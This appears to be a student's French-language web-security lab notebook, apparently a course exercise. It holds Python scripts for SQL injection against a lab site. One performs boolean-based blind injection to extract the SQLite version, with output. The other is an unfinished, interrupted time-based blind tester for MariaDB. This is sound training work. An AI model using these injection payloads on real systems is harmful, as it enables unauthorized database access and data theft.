# ipl I317B Sécurité : labos
## Semaine 3 : Vulnérabilitées web (2)

### Exercice 1, l'oracle:
Revenons un peux en arrière sur le site de notre mauvais développeur. Nous savons que le site utilise sqlite comme système de gestion de base de donnée mais nous aimerions en identifier la version. Utilisez le site de l'exercice 1 pour récupérer cette information.

https://labo.poney.pink/v01/s02/ex1/

In [13]:
import requests
import string
import time

URL = "https://labo.poney.pink/v01/s02/ex1/"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}
SUCCESS_MARKER = "Connected !"

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-_"

def try_payload(payload):
    r = requests.post(URL, data={"login": payload, "password": ""}, headers=HEADERS, timeout=10)
    return SUCCESS_MARKER in r.text, r.text

def extract_version(max_len=30, pause=0.1):
    version = ""
    for pos in range(1, max_len + 1):
        found = False
        for ch in CHARSET:
            # try double-quote style payload
            payload_dbl = f'" OR (SELECT substr(sqlite_version(),{pos},1))="{ch}" -- '
            ok, _ = try_payload(payload_dbl)
            if ok:
                version += ch
                print(f"pos {pos} -> {ch} (via double-quote payload)")
                found = True
                break

            # try single-quote style payload
            payload_sng = f"' OR (SELECT substr(sqlite_version(),{pos},1))='{ch}' -- "
            ok, _ = try_payload(payload_sng)
            if ok:
                version += ch
                print(f"pos {pos} -> {ch} (via single-quote payload)")
                found = True
                break

            # small delay
            time.sleep(pause)

        if not found:
            print(f"No character found at position {pos}; assuming end of string.")
            break
    return version

if __name__ == "__main__":
    version = extract_version(max_len=40, pause=0.05)
    print("Extracted sqlite_version():", version)


pos 1 -> 3 (via double-quote payload)
pos 2 -> . (via double-quote payload)
pos 3 -> 4 (via double-quote payload)
pos 4 -> 6 (via double-quote payload)
pos 5 -> . (via double-quote payload)
pos 6 -> 1 (via double-quote payload)
No character found at position 7; assuming end of string.
Extracted sqlite_version(): 3.46.1


### Exercice 2, l'aveugle:
Pour ce dernier exercice, vous allez travailler un peu à l'aveugle. En effet, la page suicitant notre intérêt cette fois-ci ne contient qu'un formulaire simple qui à priori, ne fait rien ... mais il est injectable (promis) !

À vous de trouvez comment et de récupérer la version du système de gestion de base de donnée : https://labo.poney.pink/v01/s02/ex2/

Tips:
  - Cette fois-ci, c'est plus du sqlite mais du mariadb : https://mariadb.com/kb/en/version/
  - Et vous travaillez à l'aveugle ;-)

In [63]:
# time_blind_manual_mariadb_id_field.py
# Manual time-based blind tester that posts the payload in form field "id".
# You will manually inspect timings to decide which character matches.

import requests
import time

URL = "https://labo.poney.pink/v01/s02/ex2/"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

# Tunables
SLEEP_DELAY = 10       # server sleeps this many seconds when condition true
TIMEOUT = 20          # must be > SLEEP_DELAY
PAUSE = 0.05            # pause between requests to be polite
MAX_POS = 10            # test positions 1..MAX_POS (adjust)
CHARSET = "0123456789." + "-_"

def elapsed_for_payload(payload: str) -> float:
    start = time.time()
    try:
        _ = requests.post(URL, data={"id": payload}, headers=HEADERS, timeout=TIMEOUT)
        return time.time() - start
    except requests.exceptions.RequestException:
        # Network error or timeout: return a large number so you can see it
        return TIMEOUT + 1.0

def test_once(pos: int, ch: str, quote: str) -> float:
    """
    Build payload testing SUBSTRING(VERSION(),pos,1) = ch using the provided quote type,
    POST it and return elapsed time in seconds.
    """
    if quote == '"':
        # payload = f'" OR IF(SUBSTRING(VERSION(),{pos},1) = "{ch}", (SELECT SLEEP({SLEEP_DELAY})), 0) -- '
        payload = f'" OR IF(1=1, SLEEP({SLEEP_DELAY}), 0) -- '
    else:
        # payload = f"' OR IF(SUBSTRING(VERSION(),{pos},1) = '{ch}', (SELECT SLEEP({SLEEP_DELAY})), 0) -- "
        payload = f"' OR IF(1=1, SLEEP({SLEEP_DELAY}), 0) -- "
    elapsed = elapsed_for_payload(payload)
    return elapsed

def run_manual_timing(max_pos: int = MAX_POS):
    print(f"Manual time-blind tester -> URL: {URL}")
    print(f"SLEEP_DELAY={SLEEP_DELAY}s, TIMEOUT={TIMEOUT}s, PAUSE={PAUSE}s")
    print(f"Testing positions 1..{max_pos} with charset length {len(CHARSET)}")
    print("-" * 80)
    for pos in range(1, max_pos + 1):
        print(f"\n=== Position {pos} ===")
        for ch in CHARSET:
            # try double-quote first (two measurements)
            t1 = test_once(pos, ch, quote='"')
            time.sleep(PAUSE)
            t2 = test_once(pos, ch, quote='"')
            time.sleep(PAUSE)
            print(f'pos={pos} ch={repr(ch):4} quote="  timings: {t1:6.3f}s, {t2:6.3f}s')
            # now single-quote variant (two measurements)
            t3 = test_once(pos, ch, quote="'")
            time.sleep(PAUSE)
            t4 = test_once(pos, ch, quote="'")
            time.sleep(PAUSE)
            print(f'pos={pos} ch={repr(ch):4} quote=\'  timings: {t3:6.3f}s, {t4:6.3f}s')
    print("\nDone. Inspect timings and pick the character whose timings ≈ SLEEP_DELAY.")

if __name__ == "__main__":
    run_manual_timing(MAX_POS)


Manual time-blind tester -> URL: https://labo.poney.pink/v01/s02/ex2/
SLEEP_DELAY=10s, TIMEOUT=20s, PAUSE=0.05s
Testing positions 1..10 with charset length 13
--------------------------------------------------------------------------------

=== Position 1 ===
pos=1 ch='0'  quote="  timings:  1.084s,  1.368s
pos=1 ch='0'  quote='  timings:  1.065s,  0.977s
pos=1 ch='1'  quote="  timings:  1.174s,  0.986s
pos=1 ch='1'  quote='  timings:  0.957s,  1.076s
pos=1 ch='2'  quote="  timings:  0.967s,  1.072s
pos=1 ch='2'  quote='  timings:  1.079s,  1.067s


KeyboardInterrupt: 

### Exercice 3, bonus:
Toujours pour l'exercice 2, pouvez-vous extraire le nom de la base de donnée et l'utilisateur utilisé pour s'y connecter ?

In [18]:
# TODO